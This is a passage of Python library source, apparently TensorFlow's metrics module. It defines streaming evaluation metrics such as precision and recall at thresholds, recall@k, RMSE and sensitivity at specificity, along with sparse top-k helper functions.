p = _aggregate_across_replicas(metrics_collections, once_across_replicas,
true_p, false_p)
update_op = compute_precision(true_positives_update_op,
false_positives_update_op, 'update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return p, update_op
@tf_export('metrics.precision_at_thresholds')
def precision_at_thresholds(labels,
predictions,
thresholds,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes precision values for different `thresholds` on `predictions`.
The `precision_at_thresholds` function creates four local variables,
`true_positives`, `true_negatives`, `false_positives` and `false_negatives`
for various values of thresholds. `precision[i]` is defined as the total
weight of values in `predictions` above `thresholds[i]` whose corresponding
entry in `labels` is `True`, divided by the total weight of values in
`predictions` above `thresholds[i]` (`true_positives[i] / (true_positives[i] +
false_positives[i])`).
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`precision`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `Tensor` whose dimensions must match
`predictions`. Will be cast to `bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
thresholds: A python list or tuple of float thresholds in `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `auc` should be
added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
precision: A float `Tensor` of shape `[len(thresholds)]`.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables that
are used in the computation of `precision`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.precision_at_thresholds is not '
'supported when eager execution is enabled.')
with variable_scope.variable_scope(name, 'precision_at_thresholds',
(predictions, labels, weights)):
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights, includes=('tp', 'fp'))
# Avoid division by zero.
epsilon = 1e-7
def compute_precision(tp, fp, name):
return math_ops.div(tp, epsilon + tp + fp, name='precision_' + name)
def precision_across_replicas(_, values):
return compute_precision(values['tp'], values['fp'], 'value')
prec = _aggregate_across_replicas(
metrics_collections, precision_across_replicas, values)
update_op = compute_precision(update_ops['tp'], update_ops['fp'],
'update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return prec, update_op
@tf_export('metrics.recall')
def recall(labels,
predictions,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the recall of the predictions with respect to the labels.
The `recall` function creates two local variables, `true_positives`
and `false_negatives`, that are used to compute the recall. This value is
ultimately returned as `recall`, an idempotent operation that simply divides
`true_positives` by the sum of `true_positives` and `false_negatives`.
For estimation of the metric over a stream of data, the function creates an
`update_op` that updates these variables and returns the `recall`. `update_op`
weights each prediction by the corresponding value in `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `Tensor` whose dimensions must match
`predictions`. Will be cast to `bool`.
predictions: The predicted values, a `Tensor` of arbitrary dimensions. Will
be cast to `bool`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `recall` should
be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
recall: Scalar float `Tensor` with the value of `true_positives` divided
by the sum of `true_positives` and `false_negatives`.
update_op: `Operation` that increments `true_positives` and
`false_negatives` variables appropriately and whose value matches
`recall`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.recall is not supported is not '
'supported when eager execution is enabled.')
with variable_scope.variable_scope(name, 'recall',
(predictions, labels, weights)):
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=math_ops.cast(predictions, dtype=dtypes.bool),
labels=math_ops.cast(labels, dtype=dtypes.bool),
weights=weights)
true_p, true_positives_update_op = true_positives(
labels,
predictions,
weights,
metrics_collections=None,
updates_collections=None,
name=None)
false_n, false_negatives_update_op = false_negatives(
labels,
predictions,
weights,
metrics_collections=None,
updates_collections=None,
name=None)
def compute_recall(true_p, false_n, name):
return array_ops.where(
math_ops.greater(true_p + false_n, 0),
math_ops.div(true_p, true_p + false_n), 0, name)
def once_across_replicas(_, true_p, false_n):
return compute_recall(true_p, false_n, 'value')
rec = _aggregate_across_replicas(
metrics_collections, once_across_replicas, true_p, false_n)
update_op = compute_recall(true_positives_update_op,
false_negatives_update_op, 'update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return rec, update_op
def _at_k_name(name, k=None, class_id=None):
if k is not None:
name = '%s_at_%d' % (name, k)
else:
name = '%s_at_k' % (name)
if class_id is not None:
name = '%s_class%d' % (name, class_id)
return name
def _select_class_id(ids, selected_id):
"""Filter all but `selected_id` out of `ids`.
Args:
ids: `int64` `Tensor` or `SparseTensor` of IDs.
selected_id: Int id to select.
Returns:
`SparseTensor` of same dimensions as `ids`. This contains only the entries
equal to `selected_id`.
"""
ids = sparse_tensor.convert_to_tensor_or_sparse_tensor(ids)
if isinstance(ids, sparse_tensor.SparseTensor):
return sparse_ops.sparse_retain(ids, math_ops.equal(ids.values,
selected_id))
# TODO(ptucker): Make this more efficient, maybe add a sparse version of
# tf.equal and tf.reduce_any?
# Shape of filled IDs is the same as `ids` with the last dim collapsed to 1.
ids_shape = array_ops.shape(ids, out_type=dtypes.int64)
ids_last_dim = array_ops.size(ids_shape) - 1
filled_selected_id_shape = math_ops.reduced_shape(ids_shape,
array_ops.reshape(
ids_last_dim, [1]))
# Intersect `ids` with the selected ID.
filled_selected_id = array_ops.fill(filled_selected_id_shape,
math_ops.to_int64(selected_id))
result = sets.set_intersection(filled_selected_id, ids)
return sparse_tensor.SparseTensor(
indices=result.indices, values=result.values, dense_shape=ids_shape)
def _maybe_select_class_id(labels, predictions_idx, selected_id=None):
"""If class ID is specified, filter all other classes.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: `int64` `Tensor` of class IDs, with shape [D1, ... DN, k]
where N >= 1. Commonly, N=1 and `predictions_idx` has shape
[batch size, k].
selected_id: Int id to select.
Returns:
Tuple of `labels` and `predictions_idx`, possibly with classes removed.
"""
if selected_id is None:
return labels, predictions_idx
return (_select_class_id(labels, selected_id),
_select_class_id(predictions_idx, selected_id))
def _sparse_true_positive_at_k(labels,
predictions_idx,
class_id=None,
weights=None,
name=None):
"""Calculates true positives for recall@k and precision@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels_sparse`.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
name: Name of operation.
Returns:
A [D1, ... DN] `Tensor` of true positive counts.
"""
with ops.name_scope(name, 'true_positives',
(predictions_idx, labels, weights)):
labels, predictions_idx = _maybe_select_class_id(labels, predictions_idx,
class_id)
tp = sets.set_size(sets.set_intersection(predictions_idx, labels))
tp = math_ops.to_double(tp)
if weights is not None:
with ops.control_dependencies((weights_broadcast_ops.assert_broadcastable(
weights, tp),)):
weights = math_ops.to_double(weights)
tp = math_ops.multiply(tp, weights)
return tp
def _streaming_sparse_true_positive_at_k(labels,
predictions_idx,
k=None,
class_id=None,
weights=None,
name=None):
"""Calculates weighted per step true positives for recall@k and precision@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
k: Integer, k for @k metric. This is only used for default op name.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
name: Name of new variable, and namespace for other dependent ops.
Returns:
A tuple of `Variable` and update `Operation`.
Raises:
ValueError: If `weights` is not `None` and has an incompatible shape.
"""
with ops.name_scope(name, _at_k_name('true_positive', k, class_id=class_id),
(predictions_idx, labels, weights)) as scope:
tp = _sparse_true_positive_at_k(
predictions_idx=predictions_idx,
labels=labels,
class_id=class_id,
weights=weights)
batch_total_tp = math_ops.to_double(math_ops.reduce_sum(tp))
var = metric_variable([], dtypes.float64, name=scope)
return var, state_ops.assign_add(var, batch_total_tp, name='update')
def _sparse_false_negative_at_k(labels,
predictions_idx,
class_id=None,
weights=None):
"""Calculates false negatives for recall@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels_sparse`.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
Returns:
A [D1, ... DN] `Tensor` of false negative counts.
"""
with ops.name_scope(None, 'false_negatives',
(predictions_idx, labels, weights)):
labels, predictions_idx = _maybe_select_class_id(labels, predictions_idx,
class_id)
fn = sets.set_size(
sets.set_difference(predictions_idx, labels, aminusb=False))
fn = math_ops.to_double(fn)
if weights is not None:
with ops.control_dependencies((weights_broadcast_ops.assert_broadcastable(
weights, fn),)):
weights = math_ops.to_double(weights)
fn = math_ops.multiply(fn, weights)
return fn
def _streaming_sparse_false_negative_at_k(labels,
predictions_idx,
k,
class_id=None,
weights=None,
name=None):
"""Calculates weighted per step false negatives for recall@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
k: Integer, k for @k metric. This is only used for default op name.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
name: Name of new variable, and namespace for other dependent ops.
Returns:
A tuple of `Variable` and update `Operation`.
Raises:
ValueError: If `weights` is not `None` and has an incompatible shape.
"""
with ops.name_scope(name, _at_k_name('false_negative', k, class_id=class_id),
(predictions_idx, labels, weights)) as scope:
fn = _sparse_false_negative_at_k(
predictions_idx=predictions_idx,
labels=labels,
class_id=class_id,
weights=weights)
batch_total_fn = math_ops.to_double(math_ops.reduce_sum(fn))
var = metric_variable([], dtypes.float64, name=scope)
return var, state_ops.assign_add(var, batch_total_fn, name='update')
@tf_export('metrics.recall_at_k')
def recall_at_k(labels,
predictions,
k,
class_id=None,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes recall@k of the predictions with respect to sparse labels.
If `class_id` is specified, we calculate recall by considering only the
entries in the batch for which `class_id` is in the label, and computing
the fraction of them for which `class_id` is in the top-k `predictions`.
If `class_id` is not specified, we'll calculate recall as how often on
average a class among the labels of a batch entry is in the top-k
`predictions`.
`sparse_recall_at_k` creates two local variables,
`true_positive_at_<k>` and `false_negative_at_<k>`, that are used to compute
the recall_at_k frequency. This frequency is ultimately returned as
`recall_at_<k>`: an idempotent operation that simply divides
`true_positive_at_<k>` by total (`true_positive_at_<k>` +
`false_negative_at_<k>`).
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`recall_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
indicating the top `k` `predictions`. Set operations applied to `top_k` and
`labels` calculate the true positives and false negatives weighted by
`weights`. Then `update_op` increments `true_positive_at_<k>` and
`false_negative_at_<k>` using these values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
should be in range [0, num_classes), where num_classes is the last
dimension of `predictions`. Values outside this range always count
towards `false_negative_at_<k>`.
predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
N >= 1. Commonly, N=1 and predictions has shape [batch size, num_classes].
The final dimension contains the logit values for each class. [D1, ... DN]
must match `labels`.
k: Integer, k for @k metric.
class_id: Integer class ID for which we want binary metrics. This should be
in range [0, num_classes), where num_classes is the last dimension of
`predictions`. If class_id is outside this range, the method returns NAN.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
metrics_collections: An optional list of collections that values should
be added to.
updates_collections: An optional list of collections that updates should
be added to.
name: Name of new update operation, and namespace for other dependent ops.
Returns:
recall: Scalar `float64` `Tensor` with the value of `true_positives` divided
by the sum of `true_positives` and `false_negatives`.
update_op: `Operation` that increments `true_positives` and
`false_negatives` variables appropriately, and whose value matches
`recall`.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match
`predictions`, or if either `metrics_collections` or `updates_collections`
are not a list or tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.recall_at_k is not '
'supported when eager execution is enabled.')
with ops.name_scope(name, _at_k_name('recall', k, class_id=class_id),
(predictions, labels, weights)) as scope:
_, top_k_idx = nn.top_k(predictions, k)
return recall_at_top_k(
labels=labels,
predictions_idx=top_k_idx,
k=k,
class_id=class_id,
weights=weights,
metrics_collections=metrics_collections,
updates_collections=updates_collections,
name=scope)
@tf_export('metrics.recall_at_top_k')
def recall_at_top_k(labels,
predictions_idx,
k=None,
class_id=None,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes recall@k of top-k predictions with respect to sparse labels.
Differs from `recall_at_k` in that predictions must be in the form of top `k`
class indices, whereas `recall_at_k` expects logits. Refer to `recall_at_k`
for more details.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
should be in range [0, num_classes), where num_classes is the last
dimension of `predictions`. Values outside this range always count
towards `false_negative_at_<k>`.
predictions_idx: Integer `Tensor` with shape [D1, ... DN, k] where N >= 1.
Commonly, N=1 and predictions has shape [batch size, k]. The final
dimension contains the top `k` predicted class indices. [D1, ... DN] must
match `labels`.
k: Integer, k for @k metric. Only used for the default op name.
class_id: Integer class ID for which we want binary metrics. This should be
in range [0, num_classes), where num_classes is the last dimension of
`predictions`. If class_id is outside this range, the method returns NAN.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
metrics_collections: An optional list of collections that values should
be added to.
updates_collections: An optional list of collections that updates should
be added to.
name: Name of new update operation, and namespace for other dependent ops.
Returns:
recall: Scalar `float64` `Tensor` with the value of `true_positives` divided
by the sum of `true_positives` and `false_negatives`.
update_op: `Operation` that increments `true_positives` and
`false_negatives` variables appropriately, and whose value matches
`recall`.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match
`predictions`, or if either `metrics_collections` or `updates_collections`
are not a list or tuple.
"""
with ops.name_scope(name, _at_k_name('recall', k, class_id=class_id),
(predictions_idx, labels, weights)) as scope:
labels = _maybe_expand_labels(labels, predictions_idx)
top_k_idx = math_ops.to_int64(predictions_idx)
tp, tp_update = _streaming_sparse_true_positive_at_k(
predictions_idx=top_k_idx,
labels=labels,
k=k,
class_id=class_id,
weights=weights)
fn, fn_update = _streaming_sparse_false_negative_at_k(
predictions_idx=top_k_idx,
labels=labels,
k=k,
class_id=class_id,
weights=weights)
def compute_recall(_, tp, fn):
return math_ops.div(tp, math_ops.add(tp, fn), name=scope)
metric = _aggregate_across_replicas(
metrics_collections, compute_recall, tp, fn)
update = math_ops.div(
tp_update, math_ops.add(tp_update, fn_update), name='update')
if updates_collections:
ops.add_to_collections(updates_collections, update)
return metric, update
@tf_export('metrics.recall_at_thresholds')
def recall_at_thresholds(labels,
predictions,
thresholds,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes various recall values for different `thresholds` on `predictions`.
The `recall_at_thresholds` function creates four local variables,
`true_positives`, `true_negatives`, `false_positives` and `false_negatives`
for various values of thresholds. `recall[i]` is defined as the total weight
of values in `predictions` above `thresholds[i]` whose corresponding entry in
`labels` is `True`, divided by the total weight of `True` values in `labels`
(`true_positives[i] / (true_positives[i] + false_negatives[i])`).
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `recall`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `Tensor` whose dimensions must match
`predictions`. Will be cast to `bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
thresholds: A python list or tuple of float thresholds in `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `recall` should be
added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
recall: A float `Tensor` of shape `[len(thresholds)]`.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables that
are used in the computation of `recall`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.recall_at_thresholds is not '
'supported when eager execution is enabled.')
with variable_scope.variable_scope(name, 'recall_at_thresholds',
(predictions, labels, weights)):
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights, includes=('tp', 'fn'))
# Avoid division by zero.
epsilon = 1e-7
def compute_recall(tp, fn, name):
return math_ops.div(tp, epsilon + tp + fn, name='recall_' + name)
def recall_across_replicas(_, values):
return compute_recall(values['tp'], values['fn'], 'value')
rec = _aggregate_across_replicas(
metrics_collections, recall_across_replicas, values)
update_op = compute_recall(update_ops['tp'], update_ops['fn'], 'update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return rec, update_op
@tf_export('metrics.root_mean_squared_error')
def root_mean_squared_error(labels,
predictions,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the root mean squared error between the labels and predictions.
The `root_mean_squared_error` function creates two local variables,
`total` and `count` that are used to compute the root mean squared error.
This average is weighted by `weights`, and it is ultimately returned as
`root_mean_squared_error`: an idempotent operation that takes the square root
of the division of `total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`root_mean_squared_error`. Internally, a `squared_error` operation computes
the element-wise square of the difference between `predictions` and `labels`.
Then `update_op` increments `total` with the reduced sum of the product of
`weights` and `squared_error`, and it increments `count` with the reduced sum
of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of the same shape as `predictions`.
predictions: A `Tensor` of arbitrary shape.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that
`root_mean_squared_error` should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
root_mean_squared_error: A `Tensor` representing the current mean, the value
of `total` divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `root_mean_squared_error`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.root_mean_squared_error is not '
'supported when eager execution is enabled.')
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=predictions, labels=labels, weights=weights)
mse, update_mse_op = mean_squared_error(labels, predictions, weights, None,
None, name or
'root_mean_squared_error')
once_across_replicas = lambda _, mse: math_ops.sqrt(mse)
rmse = _aggregate_across_replicas(
metrics_collections, once_across_replicas, mse)
update_rmse_op = math_ops.sqrt(update_mse_op)
if updates_collections:
ops.add_to_collections(updates_collections, update_rmse_op)
return rmse, update_rmse_op
@tf_export('metrics.sensitivity_at_specificity')
def sensitivity_at_specificity(labels,
predictions,
specificity,
weights=None,
num_thresholds=200,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the specificity at a given sensitivity.
The `sensitivity_at_specificity` function creates four local
variables, `true_positives`, `true_negatives`, `false_positives` and
`false_negatives` that are used to compute the sensitivity at the given
specificity value. The threshold for the given specificity value is computed
and used to evaluate the corresponding sensitivity.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`sensitivity`. `update_op` increments the `true_positives`, `true_negatives`,
`false_positives` and `false_negatives` counts with the weight of each case
found in the `predictions` and `labels`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
For additional information about specificity and sensitivity, see the
following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity
Args:
labels: The ground truth values, a `Tensor` whose dimensions must match
`predictions`. Will be cast to `bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
specificity: A scalar value in range `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
num_thresholds: The number of thresholds to use for matching the given
specificity.
metrics_collections: An optional list of collections that `sensitivity`
should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
sensitivity: A scalar `Tensor` representing the sensitivity at the given
`specificity` value.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables
appropriately and whose value matches `sensitivity`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, if
`weights` is not `None` and its shape doesn't match `predictions`, or if
`specificity` is not between 0 and 1, or if either `metrics_collections`
or `updates_collections` are not a list or tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.sensitivity_at_specificity is not '
'supported when eager execution is enabled.')
if specificity < 0 or specificity > 1:
raise ValueError('`specificity` must be in the range [0, 1].')
with variable_scope.variable_scope(name, 'sensitivity_at_specificity',
(predictions, labels, weights)):
kepsilon = 1e-7 # to account for floating point imprecisions
thresholds = [
(i + 1) * 1.0 / (num_thresholds - 1) for i in range(num_thresholds - 2)
]
thresholds = [0.0 - kepsilon] + thresholds + [1.0 + kepsilon]
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights)
def compute_sensitivity_at_specificity(tp, tn, fp, fn, name):
specificities = math_ops.div(tn, tn + fp + kepsilon)
tf_index = math_ops.argmin(math_ops.abs(specificities - specificity), 0)
tf_index = math_ops.cast(tf_index, dtypes.int32)
# Now, we have the implicit threshold, so compute the sensitivity:
return math_ops.div(tp[tf_index], tp[tf_index] + fn[tf_index] + kepsilon,
name)
def sensitivity_across_replicas(_, values):
return compute_sensitivity_at_specificity(
values['tp'], values['tn'], values['fp'], values['fn'], 'value')
sensitivity = _aggregate_across_replicas(
metrics_collections, sensitivity_across_replicas, values)
update_op = compute_sensitivity_at_specificity(
update_ops['tp'], update_ops['tn'], update_ops['fp'], update_ops['fn'],
'update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return sensitivity, update_op
def _expand_and_tile(tensor, multiple, dim=0, name=None):
"""Slice `tensor` shape in 2, then tile along the sliced dimension.
A new dimension is inserted in shape of `tensor` before `dim`, then values are
tiled `multiple` times along the new dimension.
Args:
tensor: Input `Tensor` or `SparseTensor`.
multiple: Integer, number of times to tile.
dim: Integer, dimension along which to tile.
name: Name of operation.
Returns:
`Tensor` result of expanding and tiling `tensor`.
Raises:
ValueError: if `multiple` is less than 1, or `dim` is not in
`[-rank(tensor), rank(tensor)]`.
"""
if multiple < 1:
raise ValueError('Invalid multiple %s, must be > 0.' % multiple)
with ops.name_scope(name, 'expand_and_tile',
(tensor, multiple, dim)) as scope:
# Sparse.
tensor = sparse_tensor.convert_to_tensor_or_sparse_tensor(tensor)
if isinstance(tensor, sparse_tensor.SparseTensor):
if dim < 0:
expand_dims = array_ops.reshape(
array_ops.size(tensor.dense_shape) + dim, [1])
else:
expand_dims = [dim]
expanded_shape = array_ops.concat(
(array_ops.slice(tensor.dense_shape, [0], expand_dims), [1],
array_ops.slice(tensor.dense_shape, expand_dims, [-1])),
0,
name='expanded_shape')
expanded = sparse_ops.sparse_reshape(
tensor, shape=expanded_shape, name='expand')
if multiple == 1:
return expanded
return sparse_ops.sparse_concat(
dim - 1 if dim < 0 else dim, [expanded] * multiple, name=scope)
# Dense.
expanded = array_ops.expand_dims(
tensor, dim if (dim >= 0) else (dim - 1), name='expand')
if multiple == 1:
return expanded
ones = array_ops.ones_like(array_ops.shape(tensor))
tile_multiples = array_ops.concat(
(ones[:dim], (multiple,), ones[dim:]), 0, name='multiples')
return array_ops.tile(expanded, tile_multiples, name=scope)
def _num_relevant(labels, k):
"""Computes number of relevant values for each row in labels.
For labels with shape [D1, ... DN, num_labels], this is the minimum of
`num_labels` and `k`.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels].
k: Integer, k for @k metric.
Returns:
Integer `Tensor` of shape [D1, ... DN], where each value is the number of
relevant values for that row.
Raises:
ValueError: if inputs have invalid dtypes or values.
"""
if k < 1:
raise ValueError('Invalid k=%s.' % k)
with ops.name_scope(None, 'num_relevant', (labels,)) as scope:
# For SparseTensor, calculate separate count for each row.
labels = sparse_tensor.convert_to_tensor_or_sparse_tensor(labels)
if isinstance(labels, sparse_tensor.SparseTensor):
return math_ops.minimum(sets.set_size(labels), k, name=scope)
# For dense Tensor, calculate scalar count based on last dimension, and
# tile across labels shape.
labels_shape = array_ops.shape(labels)
labels_size = labels_shape[-1]
num_relevant_scalar = math_ops.minimum(labels_size, k)
return array_ops.fill(labels_shape[0:-1], num_relevant_scalar, name=scope)
def _sparse_average_precision_at_top_k(labels, predictions_idx):
"""Computes average precision@k of predictions with respect to sparse labels.
From en.wikipedia.org/wiki/Information_retrieval#Average_precision, formula
for each row is:
AveP = sum_{i=1...k} P_{i} * rel_{i} / num_relevant_items
A "row" is the elements in dimension [D1, ... DN] of `predictions_idx`,
`labels`, and the result `Tensors`. In the common case, this is [batch_size].
Each row of the results contains the average precision for that row.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions_idx`.
Values should be in range [0, num_classes).
predictions_idx: Integer `Tensor` with shape [D1, ... DN, k] where N >= 1.
Commonly, N=1 and `predictions_idx` has shape [batch size, k]. The final
dimension must be set and contains the top `k` predicted class indices.
[D1, ... DN] must match `labels`. Values should be in range
